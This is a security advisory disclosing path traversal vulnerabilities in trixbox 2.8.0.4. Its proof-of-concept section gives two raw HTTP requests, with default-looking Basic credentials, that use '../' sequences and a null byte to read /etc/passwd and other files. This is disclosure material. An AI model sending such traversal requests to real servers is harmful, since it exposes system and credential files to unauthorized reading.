
Title: TrixBox Multiple Path Traversal Vulnerabilities
Affected Product: trixbox-2.8.0.4
Product Page: https://sourceforge.net/projects/asteriskathome/
CVSSv2: (AV:N/AC:M/Au:S/C:C/I:N/A:N) Severity: Medium
Solution Status: N/A
Credit: Sachin Wagh (@tiger_tigerboy)
Description:
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. (Source: OWASP).
Impact:
Remote attackers may use a specially crafted request with directory-traversal sequences (‘../’) to retrieve sensitive information.
Proof-of-Concept:
- Affected Request -1:
| POST /maint/index.php?packages HTTP/1.1 Host: 192.168.0.6 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Method: POST http://192.168.0.6/maint/index.php?packages HTTP/1.1 Content-Type: application/x-www-form-urlencoded Referer: http://192.168.0.6/maint/index.php?packages Content-Length: 160 Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= Connection: keep-alive xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f
|

Fig-1: Path Traversal Vulnerability
- Affected Request -2:
| GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1 Host: 192.168.0.6 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.6/maint/ Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= Connection: keep-alive Upgrade-Insecure-Requests: 1 |

Fig-2: Path Traversal Vulnerability
Credit: